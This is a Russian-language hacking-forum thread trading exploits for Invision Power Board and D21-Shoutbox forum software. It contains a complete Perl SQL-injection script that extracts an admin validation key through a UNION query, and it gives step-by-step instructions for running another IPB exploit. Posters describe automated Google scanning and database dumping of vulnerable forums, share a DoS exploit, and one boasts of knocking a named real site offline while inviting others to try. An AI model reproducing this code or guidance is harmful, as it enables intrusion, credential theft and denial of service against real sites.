• XSS.stack #1 – первый литературный журнал от юзеров форума

Уязвимости: Invision Power Board (IPB)

1. Для нормальной работы требуется, чтобы СУБД, которой управляется форум, поддерживала объединение запросов с помощью UNION. Если учесть, что большинство использует MySQL, то отсюда вывод: нужно, чтобы MySQL был > 4.
2. magic_quotes должны быть выключены.
3. Сам лично тестировал сплоит в нэте. Сработал на ура. И не только у меня.
А баг прикрыли установкой новой версии форума, 2.1.7 (по крайней мере у буржуев так).
 
Я вообще париться не стал, написал чекер и скрипт для поиска форумов в гугле, ща на шелле трудяться аж 3 скрипта, 1 ищет форумы, второй чекает списки, а третий базы сливает.
Так что ребята все круто и все работает.
 
Я кароче пишу в командной строке:
Код:
C:\Perl\bin\perl.exe C:\ipb2.pl
Вроде всё правильно, но у меня эту фигню не открывает, каторая должна открыться, а выдаёт вот что:
[mod][not null:] Я вроде старался расписать usage...Может, стоит подучить английский? :)[/mod]
 

Вложения

  • cmd.JPG
    cmd.JPG
    47.3 КБ · Просмотры: 307
pkondrat
Извини, но ты инглиш вообще понимаешь?
написано:
usage (!) - способ использования.
тебе нужно это:

perl.exe C:\ipb2.pl www.server.ru /forum/

где perl.exe - название файла интерпретатора
C:\ipb2.pl - путь к эксплоиту
www.server.ru - адрес сайта без http://
/forum/ - директория форума (т.е. где находится форум). Если форум открывается по адресу www.server.ru и в адресной строке надпись ~ www.server.ru/index.php, то директорию форума не указываешь, т.е. тут пишешь "/"
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Вроде всё правильно, но у меня эту фигню не открывает, каторая должна открыться, а выдаёт вот что:
Что там правильно ? Вот ты хочешь запустить сплойт, и что ? Хочешь чтоб он у тебя моск сканировал на предмет адреса форума и номера юзера ? Может сжалишься над ним и напишешь все это в командную строку ?

Почитай внимательно что он выдает, особенно после слова "USAGE:"
 
D21-Shoutbox v1.1 Exploit Admin Password Change
Код:
################################################
#!/usr/bin/perl                                                                                                                   #
# D21-Shoutbox v1.1 Exploit Admin Password Change                                                   #
# Author: Synsta                                                                                                                #
# Usuage Tutorial: http://w4ck1ng.com/board/showthread.php?p=431                     #
# Orginal Exploit Found by Windak & langtuhaohoa                                                      #
################################################
use HTTP::Cookies;
use LWP 5.64;
use HTTP::Request;

# variables
my $login_page = '?act=Login&CODE=01';
my $id = '';
my $table_fix = '';
my $pose_pm_page = '?';
my $tries = 5;
my $sql = '';
my $i;
my $j;


# objects
my $ua = LWP::UserAgent->new;
my $cj = HTTP::Cookies->new (file => "N/A", autosave => 0);
my $resp;

# init the cookie jar
$ua->cookie_jar ($cj);

# allow redirects on post requests
push @{ $ua->requests_redirectable }, "POST";

# get user input
print 'Shoutbox URL (ex: forumurl.com/forum): ';
chomp (my $base_url = <STDIN>);
print 'Your Username: ';
chomp (my $user = <STDIN>);
$form{entered_name} = $user;
print 'Your Password: ';
# systems without stty will error otherwise
my $stty = -x '/bin/stty';
system 'stty -echo' if $stty;      # to turn off echoing
chomp (my $pass = <STDIN>);
system 'stty echo' if $stty;      # to turn it back on
print "\n" if $stty;
print 'ID:';   # it'll say next to one of their posts
chomp (my $id = <STDIN>);
print 'Table prefix (ex: ibf_): ';
chomp ( my $table_fix = <STDIN>);

if ($base_url !~ m#^http://#) { $base_url = 'http://' . $base_url }
if ($base_url !~ m#/$|index\.php$#) { $base_url .= '/' }

do {
   $resp = $ua->post ($base_url . $login_page,
      [ UserName => $user,
        PassWord => $pass,
        CookieDate => 1,
      ]);
} while ($tries-- && !$resp->is_success());


# did we get 200 (OK) ?
if (!$resp->is_success()) { die 'Error: ' . $resp->status_line . "\n" }

# was the pass right ?
if ($resp->content =~ /sorry, the password was wrong/i) {
   die "Error: password incorrect.\n";
}

$| = 1;
print "\nAttempting to extract validation key from the database...\n ";

$sql = "?act=Shoutbox&view=mycp&sub=ignored&do=add&id=-1 union select vid,1,1 from ".$table_fix."validating where member_id=". $id ."/*";
$resp = $ua->get ($base_url . $post_pm_page . $sql );

if (!$resp->is_success()) {
  print "ERROR";
}
else {
  print "";
  #print $resp->content;
  $rs=$resp->content;
  if ( $rs =~ /uid=([a-z,0-9]{32})/ ) { print "\nValidation Key: ";  print $1;
   print "\n \nAuthor:  Synsta\n";
   print "Website: w4ck1ng.com\n";
   print "Usage Tutorial: http://w4ck1ng.com/board/showthread.php?p=431\n";
}
  else { print "Can't get the pass from output, try to find it manually : "; print $resp->content;}   
}
<STDIN>;
В гугле ищем Powered By: D21-Shoutbox 1.1

З.ы. сличино у кого то...
[mod][Ŧ1LAN:] угу сличино, сличино глянь сюда. -1[/mod]
 
Как и обещал, эксплоит для DoS-а форума IPB вышел в свет :)
Работает на всех версиях MySQL, правда для успешной работы требует magic_quotes_gpc = 0
 

Вложения

  • w4gipb216DoS.txt
    2.1 КБ · Просмотры: 325
Почему то пишет что "не является внутренней или внешней командой или исполняемым файлом"
[mod][not null:] может, стоит попробовать установить perl? Или прочесть usage и посмотреть, как его запускать?[/mod]
 
я его не в ту папку запустил ,извиняюсь
Сейчас вот выдал
server(http://xxxxxx.ru)
DIR (forum)
Testing forum vulnerability......something wrong:(
Greets 1df wolf

Значит уже пропатчен форум ?
Или синтаксис неверный
 
not null
Отлично работает! Уже повесил один форум. - с первого раза... ;) :)
Кол-во потоков 5, тайм 1. :punk: :thumbsup:

Вот урл: www.travelpod.com - пробуйте, кто не мог найти! :excl:
 
Уже ожил.
Спасибо Dub01 за то, что тестировал мои эксплоиты.
Хочу представить вашему вниманию статью о том, что из себя представляет эта уязвимость, как написать свой эксплоит и как защититься.
Новая уязвимость IPB "под микроскопом"
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх